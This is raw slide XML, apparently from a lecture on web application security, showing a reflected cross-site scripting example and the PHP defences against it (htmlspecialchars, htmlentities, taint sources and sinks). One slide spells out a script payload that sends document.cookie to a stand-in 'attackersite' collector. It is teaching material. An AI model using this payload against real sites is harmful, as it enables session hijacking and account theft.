                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>%27%2Bdocument.cookie);&lt;/</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>script</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>’&gt;</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>vulnerablesite</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>&lt;/a&gt;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="Line 17"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="993190" y="3323425"/>
              <a:ext cx="7079272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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="群組 34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4609233" y="3098054"/>
            <a:ext cx="3507372" cy="1615703"/>
            <a:chOff x="993190" y="3143248"/>
            <a:chExt cx="7079272" cy="1183998"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="矩形 35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4429124" y="3143248"/>
              <a:ext cx="285752" cy="200666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="12700" cap="sq" cmpd="sng" algn="ctr">
              <a:noFill/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 smtClean="0"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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="32" name="群組 38"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="993190" y="3233067"/>
              <a:ext cx="7079272" cy="1094179"/>
              <a:chOff x="993190" y="3323425"/>
              <a:chExt cx="7079272" cy="1094179"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="38" name="Text Box 11"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1071538" y="3357562"/>
                <a:ext cx="6929485" cy="10600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1"/>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>5. </a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr marL="0" lvl="1"/>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>&lt;HTML&gt;</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>&lt;a </a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0">
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>href</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>=‘http://</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>v</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>ulnerablesite/welcome.cgi? name=</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>&lt;script&gt;window.open(%27</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" u="sng" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="0000FF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>http://</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" u="sng" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="0000FF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>attackersite</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" u="sng" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="0000FF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>/</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" u="sng" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="0000FF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>collect.cgi?cookie</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" u="sng" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="0000FF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>=</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>%27%2Bdocument.cookie);&lt;/</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>script</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>&gt;</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>’&gt;</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1" smtClean="0">
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>vulnerablesite</a:t>
                </a:r>
                <a:r>
                  <a:rPr kumimoji="0" lang="en-US" altLang="zh-TW" sz="1400" dirty="0" smtClean="0">
                    <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                  </a:rPr>
                  <a:t>&lt;/a&gt;</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39" name="Line 17"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="993190" y="3323425"/>
                <a:ext cx="7079272" cy="0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 type="triangle" w="med" len="med"/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr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>
                  <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40" name="日期版面配置區 3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41" name="投影片編號版面配置區 4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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="頁尾版面配置區 4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 smtClean="0"/>
              <a:t>Defenses against Cross-Site Scripting in PHP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altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Sources (assumption: the database is not tainted)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$_GET</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$_POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, $_SERVER, $_COOKIE, $_FILE, $_REQUEST, $_SESSION</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="1" indent="-342900"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altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>More Sources (assumption: the database is tainted)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql_fetch_array</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql_fetch_field</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql_fetch_object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>mysql_fetch_row</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(), …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Sinks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Defenses </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>()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 smtClean="0"/>
              <a:t>Defenses against Cross-Site Scripting (cont.)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 smtClean="0"/>
              <a:t>Built-in function: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>( string $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>[, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>quote_style</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t> = ENT_COMPAT])</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Convert special characters to HTML entities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>'&amp;' (ampersand) becomes '&amp;amp;' </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>'"' (double quote) becomes '&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>;' when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>ENT_NOQUOTES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> is not set. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>''' (single quote) becomes '&amp;#039;' only when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>ENT_QUOTES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> is set. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>'&lt;' (less than) becomes '&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>;' </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>'&gt;' (greater than) becomes '&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>;' 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1214414" y="5300507"/>
            <a:ext cx="7143800" cy="12003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/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>php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$new = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>("&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>='test'&gt;Test&lt;/a&gt;", ENT_QUOTES);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>echo $new; // &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>lt;a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>=&amp;#039;test&amp;#039;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>gt;Test&amp;lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>a&amp;gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>?&gt; 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27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 smtClean="0"/>
              <a:t>Defenses against Cross-Site Scripting (cont.)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 smtClean="0"/>
              <a:t>Built-in function:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>( string $string [, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t> $</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" err="1" smtClean="0"/>
              <a:t>quote_style</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" i="1" dirty="0" smtClean="0"/>
              <a:t> = ENT_COMPAT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2600" dirty="0" smtClean="0"/>
              <a:t>] )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>the same effect with built-in function: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p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1214414" y="2643184"/>
            <a:ext cx="6572296" cy="203132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/>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>php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$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>orig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> = "I'll \"walk\" the &lt;b&gt;dog&lt;/b&gt; now";</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>$a = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>orig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>$b = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>html_entity_decode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>($a);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>echo $a; // I'll &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>quot;walk&amp;quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>; the &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>lt;b&amp;gt;dog&amp;lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>b&amp;gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>; now</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>echo $b; // I'll "walk" the &lt;b&gt;dog&lt;/b&gt; now</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>?&gt;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28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</a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Common Vulnerabilities and Defenses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Objectives and Challenges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Opportunities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Conclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>References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29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Current Status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Most known Web application security vulnerabilities can be fixed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>There are code analysis tools that can help to detect such security vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>So, what are the problems?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30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An Example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31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="群組 28"/>
